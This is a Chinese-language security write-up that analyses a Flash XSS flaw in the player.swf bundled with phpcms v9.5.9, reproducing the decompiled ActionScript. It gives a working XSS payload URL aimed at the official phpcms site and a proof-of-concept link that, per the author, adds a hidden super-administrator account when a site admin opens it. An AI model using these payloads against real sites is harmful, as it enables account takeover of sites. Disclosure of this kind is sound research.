作者:phithon

团队:安全盒子团队 www.secbox.cn

博客:https://www.leavesongs.com

 

/statics/js/ckeditor/plugins/flashplayer/player/player.swf,这是phpcms在新版本v9.5.9中加入一个flash文件。

反编译:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
public class myPlayer extends MovieClip {

public function myPlayer(){
var stream:* = undefined;
var streamname:* = undefined;
var live:* = undefined;
var subscribe:* = undefined;
var video:* = undefined;
var thumbnail:* = undefined;
var autoplay:* = undefined;
var fullscreen:* = undefined;
var skin:* = undefined;
var openLink:* = undefined;
super();
openLink = function (_arg1:ContextMenuEvent):void{
navigateToURL(new URLRequest("http://gokercebeci.com/dev/f4player/?feature=player"));
};
stage.scaleMode = StageScaleMode.NO_SCALE;
stage.align = StageAlign.TOP_LEFT;
stream = this.loaderInfo.parameters.stream;
streamname = this.loaderInfo.parameters.streamname;
live = (this.loaderInfo.parameters.live == 1);
subscribe = (this.loaderInfo.parameters.subscribe == 1);
video = this.loaderInfo.parameters.video;
thumbnail = this.loaderInfo.parameters.thumbnail;
var skinfile:* = this.loaderInfo.parameters.skin;
autoplay = (this.loaderInfo.parameters.autoplay == 1);
fullscreen = this.loaderInfo.parameters.fullscreen;
var skinEvent:* = function (_arg1:Event):void{
skin = _arg1.currentTarget.content;
stage.addChild(skin);
ExternalInterface.call("console.log", "initializating ...");
ExternalInterface.call("stream", stream);
var _local2:* = new Player(stream, streamname, live, subscribe);
skin.initialization(_local2, stage.stageWidth, stage.stageHeight, video, ((thumbnail) ? thumbnail : null), autoplay, fullscreen);
};
var sl:* = new Loader();
sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent);
sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf")));

这几句比较重要:

stream = this.loaderInfo.parameters.stream;

var skinfile:* = this.loaderInfo.parameters.skin;

var skinEvent:* = function (_arg1:Event):void{..ExternalInterface.call("stream", stream);..}

sl.contentLoaderInfo.addEventListener(Event.COMPLETE, skinEvent);

sl.load(new URLRequest(((skinfile) ? skinfile : "skins/mySkin.swf")));

第一、二句,从this.loaderInfo.parameters参数中获得stream、skinfile。第三句定义了一个函数skinEvent
,其中调用了ExternalInterface.call,将stream作为第二个参数传入。第四句将skinEvent
作为事件Event.COMPLETE的回调。第五句,是执行load操作。

所以,整个过程是这样:

加载该swf,获得参数skinfile,并加载skinfile表示的文件,在加载完成后调用回调函数skinEvent。在skinEvent中又调用ExternalInterface.call执行javascript代码,其中第二个参数可控。

既然第二个参数可控,就能造成flash xss。

官网演示:

http://www.phpcms.cn/statics/js/ckeditor/plugins/flashplayer/player/player.swf?skin=skin.swf&stream=\%22))}catch(e){alert(1)}//

核心专栏:phpcms 一个 Flash 的审计与分析-安全盒子

flash xss是比其他XSS更好用的,因为无视浏览器auditor。

构造一个增加后台管理的POC:

http://mhz.pw/game/phpcms/frame.php?target=http://10.211.55.3/phpcms

target改成自己目标即可,目标网站管理员访问POC之后即可增加一个用户名phithon,密码33444433的超级管理员:

核心专栏:phpcms 一个 Flash 的审计与分析-安全盒子